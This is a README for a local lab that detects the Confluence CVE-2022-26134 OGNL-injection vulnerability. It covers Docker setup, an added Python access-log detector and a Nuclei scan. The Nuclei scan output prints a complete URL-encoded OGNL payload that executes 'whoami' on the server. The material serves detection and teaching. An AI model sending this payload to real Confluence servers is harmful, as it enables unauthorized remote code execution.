# CVE-2022-26134-LAB
Detecting CVE-2022-26134 using Nuclei
According to a security advisory released by Atlassian on June 2, 2022, Confluence Server and Confluence Data Center contain a significant unauthenticated remote code execution vulnerability, tracked as CVE-2022-26134. The vulnerability was unpatched when the advisory was published on June 2 and was already being exploited in the wild. As of June 3, both patches and a temporary workaround are available.
This repository is only intended for experimental and educational purposes.
## Dependencies
* [Docker](https://docs.docker.com/engine/install/)
* [Nuclei](https://nuclei.projectdiscovery.io/nuclei/get-started/#nuclei-installation)
## Vulnerable Confluence Environment
Run the vulnerable environment:
```bash
docker-compose up
```
Once started, you can access the Confluence server at the following URL:
http://127.0.0.1:8090/
### Setup Confluence Server
1. The first time you visit the site you will be taken through setup.
2. Don't check any boxes and select "Next" on the "Get apps" page.
3. On the license key page, click the link that says "Get an evaluation license".
4. You will be redirected to *my.atlassian.com*. Make sure the license type selected is Confluence (Data Center). Type in whatever Organization name you like. Ensure the radio button for "Your instance is" is set to "up and running". Once you have verified these details, click the button "Generate License".
5. A confirmation modal will pop up asking if you want to install it on the server 127.0.0.1. Select "Yes".
6. Selecting yes will automatically fill in the license key on your local instance of Confluence. Select "Next".
7. Choose the "Standalone" deployment type and select "Next".
8. On the page for setting up your database, fill in the details as follows:
   - Database type: PostgreSQL
   - Setup type: Simple
   - Hostname: db
   - Port: 5432
   - Database name: confluence
   - Username: confluence
   - Password: 123456789
9. After filling in these fields, press the "Test connection" button. You should receive the message "Success! Database connected successfully". Then click "Next".
10. It will begin setting up your database. This can take a little while; hang tight.
11. Once the database setup is complete you will be on the "Load Content" page. Select the "Example Site" button.
12. Next, on the "Configure User Management" page, select "Manage users and groups with Confluence".
13. Next, on the "Configure System Administrator Account" page, create an account and select "Next".
14. Once completed you will see that the setup was successful. Press "Start".
15. It will ask you to "Create a space to store your work". Input any Space name you'd like.
16. Skip the tutorial.
17. You've now completed the evaluation setup of Confluence Server.
## Detecting CVE-2022-26134
The vulnerability is an OGNL injection affecting the HTTP server. The OGNL payload is placed in the URI of an HTTP request. Any HTTP method appears to work, whether valid (GET, POST, PUT, etc.) or invalid (e.g. “BALH”).
Reference (Rapid7 analysis on AttackerKB):
https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis
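The two properties above (payload in the URI, HTTP method irrelevant) are exactly what a log-side detection should key on. The following script is an added example, not code from this repository or from Nuclei: it parses Tomcat/Apache "combined" access-log lines, percent-decodes the request target (including double encoding) and flags any request carrying a `${...}` OGNL expression, reporting the method without filtering on it. The log format and the sample log lines are assumptions constructed for the example; the probe lines use a harmless expression rather than the scanner payload.

```python
"""Added example (not part of the lab repository): a log-side detector for the
request shape described above, an OGNL expression injected into the request URI
regardless of HTTP method. Assumes Tomcat/Apache "combined" access-log lines;
the sample lines below are constructed for this example."""
import re
from urllib.parse import unquote

# Combined log format: client - user [timestamp] "METHOD TARGET PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# An OGNL expression in the URI looks like ${ ... } once percent-encoding is undone.
OGNL_RE = re.compile(r"\$\{.+\}")


def decode_target(target: str) -> str:
    """Percent-decode until stable (bounded), so double-encoded %2524 -> %24 -> $ is caught."""
    current = target
    for _ in range(3):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
    return current


def is_ognl_injection(target: str) -> bool:
    """True if the decoded request target carries a ${...} OGNL expression."""
    return OGNL_RE.search(decode_target(target)) is not None


def parse_line(line: str):
    """Return the log fields as a dict, or None for lines that do not parse."""
    match = LOG_RE.match(line)
    return match.groupdict() if match else None


def find_suspicious(lines):
    """Scan access-log lines and return one record per request that looks like
    CVE-2022-26134 traffic. The method is reported but deliberately not used as
    a filter, because any method, valid or not, reaches the vulnerable code."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and is_ognl_injection(rec["target"]):
            hits.append({
                "ip": rec["ip"],
                "time": rec["time"],
                "method": rec["method"],
                "status": rec["status"],
                "decoded_target": decode_target(rec["target"]),
            })
    return hits


# Constructed sample log lines (not real traffic): two benign requests, one
# single-encoded OGNL probe with a harmless expression, and one double-encoded
# probe sent with an invalid method.
SAMPLE_LOG = [
    '10.0.0.5 - - [03/Jun/2022:10:15:01 +0000] "GET /login.action HTTP/1.1" 200 5120',
    '10.0.0.9 - - [03/Jun/2022:10:15:07 +0000] "GET /%24%7B%28%23a%3D1%29%7D/ HTTP/1.1" 302 0',
    '10.0.0.5 - - [03/Jun/2022:10:15:20 +0000] "GET /pages/viewpage.action?pageId=65537 HTTP/1.1" 200 8801',
    '10.0.0.9 - - [03/Jun/2022:10:15:09 +0000] "BALH /%2524%257B%2528%2523a%253D1%2529%257D/ HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["ip"]} {hit["method"]} {hit["status"]} {hit["decoded_target"]}')
```

Run against a real Confluence access log by replacing `SAMPLE_LOG` with the file's lines. The bounded decode loop matters: a single `unquote` misses double-encoded probes, and an unbounded one would loop on pathological input. The decoded target, not the raw one, is what goes into an alert, so an analyst can read the expression directly.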
### Using Nuclei
Run the following Nuclei command:
```bash
nuclei -u http://127.0.0.1:8090 -t nuclei-templates/cves/2022/CVE-2022-26134.yaml
```
Scan output:
```bash
[CVE-2022-26134] [http] [critical] http://127.0.0.1:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ [confluence]
```